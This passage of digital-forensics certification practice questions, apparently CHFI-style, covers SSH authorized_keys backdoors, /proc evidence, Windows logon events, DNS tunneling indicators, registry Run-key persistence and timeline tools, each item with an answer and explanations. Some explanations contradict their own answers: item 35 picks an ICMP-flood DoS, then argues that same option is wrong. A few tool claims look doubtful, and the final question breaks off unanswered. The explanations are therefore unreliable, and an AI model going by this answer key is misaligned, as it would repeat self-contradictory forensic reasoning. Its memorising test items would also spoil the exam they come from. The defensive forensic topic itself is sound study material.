~/.ssh/authorized_keys is a per-user file that stores the public keys (one key per line) that are permitted to log in as that user via SSH. When an attacker compromises a Linux server, a common persistence technique is to append their own public key to /root/.ssh/authorized_keys or another user's authorized_keys file, enabling silent passwordless access at any time. Checking this file for unrecognized keys — and correlating key hashes or comments with known legitimate admins — is direct evidence of key-based backdoor access, making it the correct file to examine in this scenario.

Why this answer

The log entry shows a successful public key authentication from root. To determine if this key-based access was unauthorized, you must examine the ~/.ssh/authorized_keys file for the root user. This file contains the public keys that are authorized to log in as root; if the key fingerprint SHA256:AbCdEf123456 is present, the access was legitimate; if absent, it indicates an unauthorized key was added by an attacker.

Exam trap

The trap here is that candidates may focus on the log entry itself or server configuration (sshd_config) instead of realizing that the authorized_keys file is the only place that records which keys are permitted, making it the direct source for verifying whether the key used was pre-authorized.

How to eliminate wrong answers

Option A is wrong because /var/log/syslog is a general system log that may contain similar entries but does not store the authorized public keys themselves; it would only duplicate the auth.log information without providing the key validation data. Option B is wrong because /etc/ssh/sshd_config controls SSH server settings (e.g., PermitRootLogin, PubkeyAuthentication) but does not list which specific keys are authorized; it cannot confirm whether a particular key was pre-authorized. Option D is wrong because /etc/passwd stores user account information (UID, GID, home directory, shell) but has no relation to SSH public key fingerprints or authorized_keys content.

25
MCQhard

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

A.The system was rebooted recently
B.The malware is a kernel module
C.A process with PID 12345 is running the malware
D.The malware was executed via a cron job
AnswerC

The /proc/[pid]/exe entry is a symlink to the exact on-disk binary that process 12345 is currently executing. If that link resolves to a deleted or hidden location, such as '/path/to/evil (deleted)', it indicates the process is running malware that was opened and unlinked to evade detection. This is a strong and direct indicator that PID 12345 is executing the malicious code.

Why this answer

The /proc filesystem is a virtual filesystem that provides process information. The entry /proc/12345/exe is a symbolic link pointing to the executable file that started the process with PID 12345. Since this link exists and points to /tmp/.hidden/malware, it confirms that a process with PID 12345 is currently running that malware binary.

Exam trap

A common misconception in forensic analysis is that /proc entries persist across reboots or that a symlink in /proc indicates a kernel module. However, /proc/[pid]/exe points to the user-space binary that started the process, confirming a running process.

How to eliminate wrong answers

Option A is wrong because the existence of /proc/12345/exe indicates the process is currently running; a reboot would clear all /proc entries, so this entry would not exist after a reboot. Option B is wrong because kernel modules are typically loaded via insmod/modprobe and do not have entries in /proc/[pid]/exe; they are listed under /proc/modules or via lsmod. Option D is wrong because while a cron job could have launched the malware, the /proc entry alone does not indicate the launch mechanism; it only shows the current running state, not the scheduling method.

26
MCQmedium

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

A.bash_history for suspicious commands
B./etc/shadow for recent modifications
C.~/.ssh/authorized_keys for unauthorized keys
D./var/log/syslog for cron job entries
AnswerC

The ~/.ssh/authorized_keys file for each user is the authoritative list of public keys allowed to log in as that account via SSH. Attackers commonly append a single base64-encoded line containing their public key, often with command= or from= restrictions to evade detection, enabling silent passwordless access independent of any password change. Comparing every entry against known administrative keys—while verifying file ownership, permissions, and the account's shell—is the direct method to locate such an implanted credential.

Why this answer

The log entry shows a successful SSH authentication using a public key from an unknown IP. The most direct way to confirm unauthorized access is to check ~/.ssh/authorized_keys for any rogue public keys that were added without the user's knowledge, as this file controls which keys are permitted to authenticate as that user. If an attacker added their own public key here, they could log in without a password, making this the primary artifact to examine.

Exam trap

EC-Council often tests the distinction between authentication artifacts (authorized_keys) and post-authentication artifacts (bash_history), leading candidates to mistakenly focus on what the attacker did after login rather than how they got in.

How to eliminate wrong answers

Option A is wrong because bash_history only shows commands executed after login, not the authentication method or key used; it would not reveal how the attacker gained access. Option B is wrong because /etc/shadow stores password hashes and is not involved in public key authentication; modifying it would not enable key-based SSH access. Option D is wrong because /var/log/syslog contains general system messages and cron job entries, but the SSH authentication event is already captured in auth.log; cron jobs are unrelated to the public key authentication method used here.

27
MCQeasy

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

A.Brute-force password attack
B.Kerberos golden ticket attack
C.ARP spoofing attack
D.Pass-the-hash attack
AnswerA

A brute-force password attack is characterized by a high volume of Event ID 4625 (failed logon) entries, often from multiple source IPs or workstations, as the attacker cycles through password dictionaries or guesses. The systematic nature of these failures—repeated attempts against one or more accounts—is the definitive signature, which aligns with the observed 'multiple failed logons from different sources' in the security log.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple such events for a single user account from various IP addresses within a short time frame is the classic signature of a brute-force password attack, where an attacker tries many passwords against one account from multiple source IPs to evade rate-limiting or IP-based blocking.

Exam trap

The trap here is that candidates may confuse Event ID 4625 with other attack types like pass-the-hash (which typically produces 4624 success events) or assume any authentication failure indicates a Kerberos attack, but the key differentiator is the pattern of multiple failure attempts from varied IPs targeting a single account.

How to eliminate wrong answers

Option B is wrong because a Kerberos golden ticket attack involves forging a Ticket Granting Ticket (TGT) using the KRBTGT account hash, which does not generate multiple 4625 failure events from different IPs; it would instead produce successful logon events (4624) with unusual ticket attributes. Option C is wrong because ARP spoofing is a Layer 2 attack that manipulates ARP tables to intercept traffic on a local network segment; it does not generate Windows Security Event ID 4625 entries, which are specific to authentication attempts at the application or OS level. Option D is wrong because a pass-the-hash attack uses stolen NTLM hashes to authenticate without knowing the plaintext password, typically resulting in successful logon events (4624) rather than repeated failure events (4625) from multiple IPs.

28
Multi-Selecthard

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Select 3 answers
A.Low TTL values in DNS responses
B.DNS queries sent to multiple different DNS servers
C.DNS responses with unusually large payloads (e.g., TXT records)
D.High volume of DNS queries to a single domain
E.DNS queries for random-looking subdomains
AnswersC, D, E

In normal operation, DNS TXT records are used for verifiable text like SPF policies or domain ownership tokens and are rarely larger than a few hundred bytes; an attacker exfiltrating data will pad or encode payloads into TXT answers, causing response sizes to exceed typical benign traffic. Since a standard UDP DNS response without EDNS0 is limited to 512 bytes, responses that push against or exceed that limit (and require TCP fallback) are a solid anomaly. These oversized TXT responses, combined with a queried domain that also receives many random subdomain queries, are a hallmark of DNS tunneling.

Why this answer

Option C is correct because DNS tunneling tools such as iodine and dnscat2 encode stolen data in TXT, NULL, or CNAME records, producing responses far larger than the typical 512-byte UDP DNS limit and thus a strong exfiltration indicator. Option D is correct because exfiltration over DNS requires many queries to carry data out, so a high volume of queries to a single domain (often thousands per hour) stands out against normal resolver traffic. Option E is correct because the encoded payload is placed in the leftmost label, generating long, random-looking subdomains such as 'aGVsbG8.evil.com' that are characteristic of DNS tunneling.

Option A is not a reliable indicator: low TTLs are common in fast-flux and load-balancing setups and are not specific to exfiltration. Option B is also not specific, since clients legitimately query multiple configured or fallback DNS servers during normal resolution.

Exam trap

The CHFI exam often tests the misconception that low TTL values are a definitive sign of exfiltration, but TTL manipulation is rarely used in DNS tunneling and is more commonly associated with legitimate DNS optimization or fast-flux networks.

29
Multi-Selectmedium

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Select 2 answers
A..plist files
B.Unified logging
C.Prefetch files (*.pf)
D.Registry hive files
E.Event ID 4624
AnswersA, B

Property list files on macOS are structured XML or binary files that store per-app preferences, recent item lists, window states, and other persistent configuration data. In forensic examinations, they are critical for attributing user activity because they often contain timestamps and device-specific identifiers, and can be decoded with `plutil` or `strings`. They serve as the macOS counterpart to the Windows Registry for configuration and usage artifacts.

Why this answer

Option A (.plist files) is correct because macOS stores application and system preferences, recent items, and user-activity metadata in property list files (often binary or XML) under ~/Library/Preferences and /Library/Preferences, which investigators can parse with plutil or plist editors to reconstruct user behavior. Option B (Unified logging) is correct because macOS's Unified Logging system (introduced in 10.12, accessed via the log command or log show) records detailed system, application, and user events in .tracev3 files under /var/db/diagnostics, providing a rich timeline of activity. Option C (Prefetch files) is incorrect because *.pf Prefetch files are a Windows artifact (C:\Windows\Prefetch) that does not exist on macOS.

Option D (Registry hive files) is incorrect because the Windows Registry (e.g., NTUSER.DAT, SYSTEM, SAM) is not present on macOS, which uses plists and other stores instead. Option E (Event ID 4624) is incorrect because that is a Windows Security event log identifier for a successful logon, not a macOS forensic artifact.

Exam trap

This question tests the distinction between Windows and macOS forensic artifacts. The trap is that candidates familiar with Windows forensics may incorrectly assume Prefetch files or Registry hives exist on macOS, or that Event ID 4624 has a macOS equivalent.

30
Multi-Selecthard

Which THREE of the following are indicators of a webshell compromise on a web server?

Select 3 answers
A.High CPU usage from web server processes
B.Regular successful logins to the server with correct credentials
C.Presence of files with extensions like .php, .asp, or .jsp in web directories that are not part of the original application
D.Unexpected outbound connections from the web server to unknown IP addresses
E.Decrease in network traffic
AnswersA, C, D

Webshell activity spawns unexpected processes under the web server's user context, driving sustained CPU consumption from httpd, w3wp, or similar. This resource anomaly reflects attacker commands executing through the shell, distinguishing it from normal request-driven load spikes.

Why this answer

Option A is correct because webshells often execute resource-intensive commands (cryptomining, brute-forcing, scanning, or reverse shells) through the web server's worker processes, so sustained high CPU usage by httpd/nginx/w3wp or their child processes is a common indicator. Option C is correct because attackers typically drop or upload webshell files into web-accessible directories, so unexpected .php, .asp, .aspx, or .jsp files that are not part of the original application are a strong sign of compromise. Option D is correct because a webshell commonly establishes command-and-control or exfiltration channels, producing unexpected outbound connections from the web server to unknown external IP addresses on unusual ports.

Option B does not belong because legitimate successful logins with valid credentials are normal activity and are not, by themselves, an indicator of a webshell. Option E does not belong because a decrease in network traffic is not characteristic of webshell activity, which typically generates additional traffic rather than reducing it.

Exam trap

Candidates often mistake normal administrative behavior (Option B) for suspicious activity, but webshells bypass authentication entirely, making regular successful logins irrelevant as indicators.

31
MCQmedium

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

A.Clearing browser history
B.Establishing persistence for malware
C.Updating system time
D.Configuring firewall rules
AnswerB

Registry Run keys are a classic autostart persistence mechanism: HKCU and HKLM under Software\Microsoft\Windows\CurrentVersion\Run contain command lines that the shell launches immediately after user logon. Malware writes an executable path or PowerShell command into that value to re-establish itself on every reboot or logon attempt. Because the value is executed automatically with the user's or SYSTEM's context, it provides reliable persistence. This is why a process writing to Run keys is strongly indicative of persistence rather than a harmless activity.

Why this answer

The Run key is a common auto-start location used for persistence. Writing to it ensures the process executes at user logon.

32
MCQhard

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

A.The system was shut down improperly
B.The file is corrupted
C.The user deleted the history
D.The HISTSIZE environment variable is set to 0 or the history file is redirected to /dev/null
AnswerD

When HISTSIZE is set to 0, bash immediately stops appending commands to the in-memory history list, and because the history file is only updated from that list on shell exit or explicit `history -w`, the result is an empty or nonexistent .bash_history. Similarly, configuring HISTFILE to point to /dev/null causes every write to go to a discard device, so no command history survives. Investigators should check the owning user's ~/.bashrc, ~/.bash_profile, and environment for these settings, as they are commonly used in privacy-conscious or automated environments.

Why this answer

The HISTSIZE environment variable controls how many commands are retained in memory during a session. When set to 0, no commands are stored, and the history file (typically ~/.bash_history) remains empty. Alternatively, if HISTFILE is redirected to /dev/null, all history writes are discarded, explaining the empty file despite active use.

Exam trap

Investigators sometimes overlook the possibility that an empty bash_history file may be due to configuration variables like HISTSIZE or HISTFILE, rather than assuming user deletion or corruption.

How to eliminate wrong answers

Option A is wrong because an improper shutdown (e.g., power loss) would not cause the bash_history file to be empty; it might truncate or lose unsaved entries, but the file would still contain previously saved history. Option B is wrong because file corruption typically results in unreadable content or errors, not a perfectly empty file with no error messages. Option C is wrong because if the user deleted the history (e.g., using 'history -c' or manually removing the file), the file would be absent or empty only after deletion; however, the question states the file is empty, not missing, and active use would normally generate new entries unless history recording is disabled.

33
MCQmedium

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

A.log2timeline
B.Sleuth Kit
C.Nmap
D.Wireshark
AnswerA

log2timeline parses timestamps from disparate artefacts and normalises them into a single super-timeline, letting examiners correlate activity across file system, registry and log sources. This satisfies the requirement to parse and correlate timestamps from various artefacts.

Why this answer

log2timeline (now part of the Plaso framework) is the de facto tool for timeline analysis in digital forensics. It parses a wide range of artifacts (e.g., $MFT, $UsnJrnl, Prefetch, Registry hives, event logs) and correlates their timestamps into a unified, super-timeline, enabling examiners to reconstruct system activity chronologically.

Exam trap

EC-Council CHFI often tests the distinction between file system analysis tools (Sleuth Kit) and timeline correlation tools (log2timeline), so candidates may mistakenly choose Sleuth Kit because it includes mactime, forgetting that log2timeline is the primary tool for building a super-timeline from multiple artifacts.

How to eliminate wrong answers

Option B (Sleuth Kit) is wrong because it is a collection of command-line tools for file system analysis (e.g., fls, icat, mmls) but does not perform timeline correlation or multi-artifact timestamp parsing. Option C (Nmap) is wrong because it is a network scanning tool used for port discovery and service enumeration, not for forensic timeline analysis. Option D (Wireshark) is wrong because it is a network protocol analyzer for capturing and inspecting packets, not a tool for parsing file system or registry timestamps.

34
MCQhard

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

A..plist files
B.FSEvents
C.Core Storage logs
D.Apple Unified Logging
AnswerD

Apple Unified Logging is the centralized, high-volume logging architecture built into macOS Sierra and later, aggregating kernel, framework, and app messages into a compact binary format on disk (e.g., in /var/db/diagnostics/). The log show command is the primary interface to filter and extract these entries, accepting predicates for process, subsystem, and time range. This makes it the correct answer because log show exclusively queries the unified logging system, not property lists, filesystem event journals, or Core Storage metadata.

Why this answer

The 'log show' command with --predicate queries the Apple Unified Logging system, which centralizes logs from various subsystems.

35
MCQeasy

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

A.Network reconnaissance (ping sweep)
B.A man-in-the-middle attack
C.A DoS attack using ICMP floods
D.A DNS amplification attack
AnswerC

A large volume of ICMP echo requests (ping) from a single source to a single destination, especially with varying payload sizes, is a classic signature of an ICMP flood DoS attack. The sheer volume of packets consumes the target's bandwidth and processing resources, and the varied payload sizes are often used to defeat filters that block only fixed-size pings. This pattern is distinct from reconnaissance or protocol-specific abuse because it intentionally overwhelms the victim with raw ICMP traffic.

Why this answer

The scenario describes a single source sending a large number of ICMP echo requests to a single destination with varying payload sizes. This is characteristic of an ICMP flood attack, a type of DoS attack where the attacker overwhelms the target with echo requests, consuming bandwidth and processing resources. The varying payload sizes may be an attempt to evade simple packet filters or to maximize resource consumption.

In contrast, a ping sweep would involve sending requests to multiple destinations to discover live hosts, not a sustained high-volume stream to one host. Therefore, this is most likely a DoS attack, not reconnaissance.

Exam trap

EC-Council often tests the ability to differentiate between reconnaissance and attack by presenting ICMP traffic with varying payloads. Candidates may mistakenly classify a high-volume single-target ICMP flood as a ping sweep (Option A) due to the payload variation, but the key indicator is the single destination and overwhelming volume, which points to a DoS attack.

How to eliminate wrong answers

Option B is wrong because a man-in-the-middle attack typically involves ARP spoofing, DNS spoofing, or session hijacking, not a series of ICMP echo requests with varying payloads. Option C is wrong because a DoS attack using ICMP floods would involve a high volume of packets from potentially multiple sources to overwhelm the target, not a single source sending packets with varying sizes to a single destination, which is too low-volume for denial of service. Option D is wrong because a DNS amplification attack uses spoofed DNS queries with a small request size to generate large responses from open resolvers, targeting a victim with UDP traffic, not ICMP echo requests.

36
MCQeasy

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

A.system.log
B.Audit log
C.FSEvents
D.Unified logging
AnswerD

Unified logging is the current logging architecture in macOS, introduced in Sierra, and aggregates system and user messages into a high-performance, structured, binary trace database stored under /var/db/diagnostics. It supports advanced querying via the `log` command, captures multiple log levels and activities, and is the authoritative source for modern forensic analysis of system and application behavior.

Why this answer

Unified logging is the correct answer because macOS stores high-level events like application launches and authentication attempts in a binary format within the unified log system (stored in /var/db/diagnostics/ and /var/db/uuidtext/). The 'log' command is the native tool to query these logs, using predicates and options such as 'log show' or 'log stream', making it the only option that matches both the binary format and the query method described.

Exam trap

EC-Council often tests the misconception that all macOS logs are plain-text files, leading candidates to choose system.log, when in fact modern macOS uses the binary unified log system that requires the 'log' command for querying.

How to eliminate wrong answers

Option A is wrong because system.log is a legacy plain-text log file (located at /var/log/system.log) that stores syslog-style messages, not a binary format, and is not queried with the 'log' command. Option B is wrong because the Audit log (managed by the auditd daemon, stored in /var/audit/) records security-relevant events in BSM (Basic Security Module) binary format, but it is queried using the 'praudit' or 'auditreduce' commands, not the 'log' command. Option C is wrong because FSEvents (File System Events) logs file system changes in a binary format (stored in /.fseventsd/), but it does not store application launches or authentication attempts, and it is queried using the 'fs_usage' or 'fseventer' tools, not the 'log' command.

37
MCQmedium

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

A.Bash history
B.Systemd service
C.Cron job
D.Init script
AnswerC

Cron job is correct because /etc/cron.d/ contains cron schedule files that the cron daemon parses and executes at predefined time intervals using the standard 'minute hour day month weekday' syntax. These jobs run as the specified user and can be set to execute arbitrary commands, making them a common mechanism attackers use for scheduled persistence. The file's presence in /etc/cron.d/ with a valid time specification directly indicates a cron job rather than any other startup or logging mechanism.

Why this answer

The cron daemon reads job definitions from files in /etc/cron.d/ and executes them according to the schedule specified. Finding a file named 'malware' in /etc/cron.d/ that runs every 5 minutes as root directly indicates a cron job persistence mechanism, as this is the standard location for system-wide cron entries.

Exam trap

EC-CHFI often tests the distinction between cron jobs and systemd timers or init scripts, and the trap here is that candidates may confuse the /etc/cron.d/ directory with init scripts or systemd unit files, not realizing that cron is a separate scheduler with its own file format and location.

How to eliminate wrong answers

Option A is wrong because Bash history (~/.bash_history) records user commands but does not automatically execute them at intervals; it is a log, not a persistence mechanism. Option B is wrong because a systemd service uses unit files (e.g., .service files in /etc/systemd/system/) and is managed by systemctl, not by entries in /etc/cron.d/. Option D is wrong because init scripts are stored in /etc/init.d/ and are used by SysV init or Upstart, not by cron, and they run at system startup or shutdown, not on a scheduled interval.

38
MCQmedium

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

A.HKLM\SYSTEM
B.HKLM\SAM
C.HKLM\SOFTWARE
D.NTUSER.DAT
AnswerD

NTUSER.DAT is the per-user registry hive loaded as HKEY_CURRENT_USER at logon. It contains explorer shell bag state, UserAssist execution counts and last-run timestamps, RecentDocs MRU, and many user-profile settings. For Windows 10 analysis, this hive is the primary registry file for reconstructing a user's activity and program execution.

Why this answer

The NTUSER.DAT file is the registry hive that stores user-specific configuration data for each user profile on a Windows 10 system. It contains the ShellBags keys (for folder view settings and recent folder access), UserAssist keys (tracking GUI-based program executions via the ROT13-encoded count and timestamp), and MRU (Most Recently Used) lists (for recently opened files and applications). These artifacts are critical for forensic analysis of user activity, and they are not stored in any of the HKLM hives, which are machine-wide.

Exam trap

A common misconception is that user-specific artifacts like ShellBags and UserAssist are stored in the HKLM\SOFTWARE hive because it contains application-related settings, but in reality, these are per-user and reside in the NTUSER.DAT hive (loaded as HKCU).

How to eliminate wrong answers

Option A is wrong because HKLM\SYSTEM stores system-wide configuration data such as device drivers, services, and boot settings, not user-specific ShellBags, UserAssist, or MRU lists. Option B is wrong because HKLM\SAM contains the Security Account Manager database with local user account hashes and group memberships, not user activity artifacts like file access logs. Option C is wrong because HKLM\SOFTWARE holds machine-wide software settings and application configurations, but user-specific data like ShellBags and UserAssist are stored per-user in NTUSER.DAT, not in this hive.

39
MCQeasy

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

A.HKU\.DEFAULT
B.HKLM\SYSTEM
C.HKLM\SAM
D.NTUSER.DAT
AnswerD

NTUSER.DAT is the registry hive loaded into HKCU when a user logs on, and it contains that user's personal settings, application preferences, environment variables, desktop appearance, and recent documents. It is stored in the user's profile directory (e.g., C:\Users\Username\NTUSER.DAT) and is a key artifact for forensic analysis of user activity and configuration. The question's 'user' is best answered by NTUSER.DAT because HKCU itself is not a file, but NTUSER.DAT is the physical hive that backs it.

Why this answer

NTUSER.DAT is the correct answer because it is the registry hive file that stores per-user settings, including application configurations and recently accessed files (e.g., MRU lists). When a user logs on, Windows loads NTUSER.DAT into HKEY_CURRENT_USER (HKCU), making it the primary repository for user-specific data.

Exam trap

EC-Council often tests the misconception that HKCU is a separate hive file, when in fact it is a dynamic view of NTUSER.DAT loaded from the user's profile directory.

How to eliminate wrong answers

Option A is wrong because HKU\.DEFAULT contains the profile settings for the LocalSystem account (used by services), not for interactive users, and does not store per-user application settings or recent files. Option B is wrong because HKLM\SYSTEM stores system-wide configuration, boot parameters, and driver settings, not user-specific data. Option C is wrong because HKLM\SAM holds the Security Account Manager database (user and group credentials), not application settings or recent file lists.

40
Multi-Selectmedium

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Select 2 answers
A.HKLM\SAM
B.C:\Windows\Prefetch
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Services
E.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
AnswersD, E

HKLM\SYSTEM\CurrentControlSet\Services satisfies the persistence requirement because Windows loads service entries here at boot via the Service Control Manager, before user logon. Malware registers a malicious driver or service to achieve SYSTEM-level autostart, making this a core location for forensic examination of startup persistence.

Why this answer

Option D, HKLM\SYSTEM\CurrentControlSet\Services, is correct because this registry hive stores service configurations, including the Start value that determines whether a service (or malicious driver/service) launches automatically at boot, making it a classic autostart persistence location. Option E, HKCU\Software\Microsoft\Windows\CurrentVersion\Run, is correct because the per-user Run key causes listed programs to execute automatically when that user logs on, a very common malware persistence mechanism. Option A, HKLM\SAM, is not an autostart location; it stores local account and security database information.

Option B, C:\Windows\Prefetch, is a filesystem artifact used for execution evidence and performance, not a registry startup key. Option C, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags, records folder view settings and is useful for user activity forensics, not automatic execution.

Exam trap

The trap here is that candidates confuse registry locations used for user-specific startup (like HKCU\...\Run) with system-wide persistence mechanisms, or they mistakenly think non-startup keys like SAM or ShellBags are relevant to auto-execution.

41
Multi-Selectmedium

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Select 2 answers
A.Event ID 4624
B.SAM hive
C.Prefetch files
D.LNK files
E.ShellBags
AnswersD, E

LNK files (Windows shortcuts) are automatically created when a user accesses a file or folder, particularly in locations like the Recent folder (%AppData%\Microsoft\Windows\Recent), desktop, or Start Menu. These shortcut files embed the target path, creation timestamp, last written timestamp, and even the volume serial number of the drive, making them excellent evidence of recently opened documents. Forensic tools can parse LNK metadata to reconstruct user file access activity, even if the original file has been deleted.

Why this answer

LNK files (option D) are Windows shortcut files that store a reference to the original target file or folder, including its path, volume information, and timestamps, and they are created or updated when a user opens a document or folder, making them a direct indicator of recent access. ShellBags (option E) are registry entries (in NTUSER.DAT under HKCU\Software\Microsoft\Windows\Shell) that record folder view settings and paths the user has browsed in Explorer, so they reveal folders that were accessed even if the folder no longer exists. Event ID 4624 (option A) is a Security log entry for successful logon events and does not record file or folder access.

The SAM hive (option B) stores local user account and password hash data, not file access history. Prefetch files (option C) record execution of applications to speed up subsequent launches, not the opening of individual files or folders.

Exam trap

The CHFI exam often tests the distinction between artifacts that record file/folder access (LNK, ShellBags) versus artifacts that record program execution (Prefetch) or system-level events (Event IDs), leading candidates to mistakenly select Prefetch files or Event ID 4624.

42
MCQmedium

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

A.The session was hijacked after the handshake
B.A TCP half-open scan was performed
C.The TCP connection was successfully established
D.The connection was refused by the server
AnswerC

The presence of all three handshake packets—SYN, SYN-ACK, and ACK—in the capture, with the ACK carrying a valid sequence number that acknowledges the server's SYN-ACK, confirms that the TCP connection reached the ESTABLISHED state. This is further corroborated by data segments following the handshake, where the payload-bearing packets use the negotiated sequence and acknowledgment numbers to advance the byte stream. In forensic packet analysis, a completed handshake with subsequent payload indicates a successful connection.

Why this answer

The TCP three-way handshake (SYN, SYN-ACK, ACK) completes successfully, establishing a connection. The subsequent HTTP GET request confirms the connection is fully open and usable for application-layer data transfer. This is the standard sequence for a normal TCP connection establishment.

Exam trap

EC-Council CHFI exams often test the distinction between a completed TCP handshake (SYN, SYN-ACK, ACK) and a half-open scan (SYN only, no final ACK). Candidates may mistakenly think any SYN followed by SYN-ACK indicates a scan, but the presence of the final ACK and data proves the connection was fully established.

How to eliminate wrong answers

Option A is wrong because session hijacking would require injecting packets with forged sequence numbers after the handshake, not the normal completion of the handshake and a legitimate HTTP GET. Option B is wrong because a TCP half-open scan (e.g., using nmap -sS) sends only a SYN and never completes the handshake with an ACK; the presence of a full handshake and an HTTP GET indicates a completed connection, not a scan. Option D is wrong because a connection refused would result in a RST packet from the server in response to the SYN, not a SYN-ACK and subsequent data transfer.

43
MCQhard

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

A.It automatically correlates events from different sources and provides a unified timeline
B.It can detect malware by signature scanning
C.It generates a timeline only from Windows Event Logs
D.It encrypts the timeline for secure storage
AnswerA

Plaso log2timeline ingests data from filesystem metadata, application logs, and artifact parsers, then normalizes and correlates timestamped events into a single timeline. This unified super-timeline allows an analyst to visualize and sequence activity across email, web, and file transactions. Consequently, it enables efficient analysis of event sequences rather than per-source inspection.

Why this answer

Plaso (log2timeline) is designed to automatically parse and correlate artifacts from multiple sources—such as Windows Event Logs, Registry hives, Prefetch files, and USN journals—into a single, unified super timeline. This eliminates the need for manual correlation across disparate log files, which is error-prone and time-consuming, making automated correlation the primary advantage over manual timeline creation.

Exam trap

In EC-CHFI exams, candidates often confuse Plaso's automated correlation with other security functions like malware detection or encryption, leading to incorrect choices.

How to eliminate wrong answers

Option B is wrong because Plaso does not perform signature-based malware detection; it is a timeline creation and forensic artifact parsing tool, not an antivirus or intrusion detection system. Option C is wrong because Plaso generates timelines from a wide range of forensic artifacts (e.g., Registry, file system metadata, browser history), not exclusively from Windows Event Logs. Option D is wrong because Plaso does not encrypt timelines; encryption is a separate storage or transport concern, not a core feature of the timeline generation process.

44
Multi-Selecteasy

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Select 2 answers
A./etc/passwd
B./var/log/syslog
C./var/log/auth.log
D./etc/shadow
E./proc/cpuinfo
AnswersB, C

/var/log/syslog is the primary, centralized system log on Debian-based distributions like Ubuntu, written by the rsyslog daemon. It aggregates high-level kernel messages, service start and stop events, hardware errors, cron activity, and other system-level notifications from software that uses the syslog(3) API. This file is essential for troubleshooting and forensic timeline reconstruction because it captures a broad chronological record of system behavior, though it deliberately excludes authentication events.

Why this answer

/var/log/syslog (B) is correct because it is the standard system log on many Linux distributions (Debian/Ubuntu and others), recording kernel messages, daemon activity, service events, and general system errors that are valuable for reconstructing a timeline during forensic analysis. /var/log/auth.log (C) is also correct because it captures authentication-related events such as logins, sudo usage, su attempts, and PAM/SSH authentication failures or successes, which are essential for investigating unauthorized access. The unmarked options do not belong: /etc/passwd (A) and /etc/shadow (D) are account database files, not log files, even though they are useful for reviewing user accounts and password hashes, and /proc/cpuinfo (E) is a virtual file exposing CPU details, not a log of system or security events.

Exam trap

The exam highly tests the distinction between configuration files (like /etc/passwd and /etc/shadow) and dynamic log files, leading candidates to mistakenly select static system files as sources of forensic evidence.

45
MCQmedium

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

A.A denial-of-service (DoS) flood
B.A port scan reconnaissance
C.A man-in-the-middle attack
D.Normal web browsing traffic
AnswerB

This pattern is the classic signature of a TCP SYN scan, a common port scanning technique. The attacker sends a SYN packet to each port on a target; if the port is open, the target responds with a SYN-ACK, while closed ports trigger an RST or no reply. Observing multiple SYN packets to different ports without complete handshakes indicates systematic probing to enumerate which services are listening, exactly what a port scan reconnaissance does.

Why this answer

The observation of TCP SYN packets sent to multiple ports without any SYN-ACK replies indicates a port scan, specifically a SYN scan (half-open scan). In a SYN scan, the attacker sends a SYN packet to each port; if the port is open, the target responds with a SYN-ACK, but the attacker never completes the handshake. The absence of any SYN-ACK replies suggests that either all scanned ports are closed (RST responses would be expected) or the target is filtering traffic, but the pattern of multiple SYN packets to different ports is the hallmark of reconnaissance, not a denial-of-service attack.

Exam trap

A common trap is confusing a SYN scan (reconnaissance) with a SYN flood (DoS attack); the key differentiator is the lack of SYN-ACK replies combined with scanning multiple ports, indicating reconnaissance rather than an attempt to overwhelm the target.

How to eliminate wrong answers

Option A is wrong because a denial-of-service (DoS) flood typically involves a high volume of traffic (e.g., SYN flood) to overwhelm a target, often with spoofed source IPs, and would generate SYN-ACK replies from the target if ports are open; the absence of SYN-ACK replies here suggests a scan, not an attack. Option C is wrong because a man-in-the-middle attack requires intercepting and potentially modifying communications between two parties, which is not indicated by a series of SYN packets to multiple ports with no replies. Option D is wrong because normal web browsing traffic involves completing the TCP three-way handshake (SYN, SYN-ACK, ACK) and then exchanging HTTP data, not sending SYN packets to multiple ports without receiving SYN-ACK replies.

46
MCQhard

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

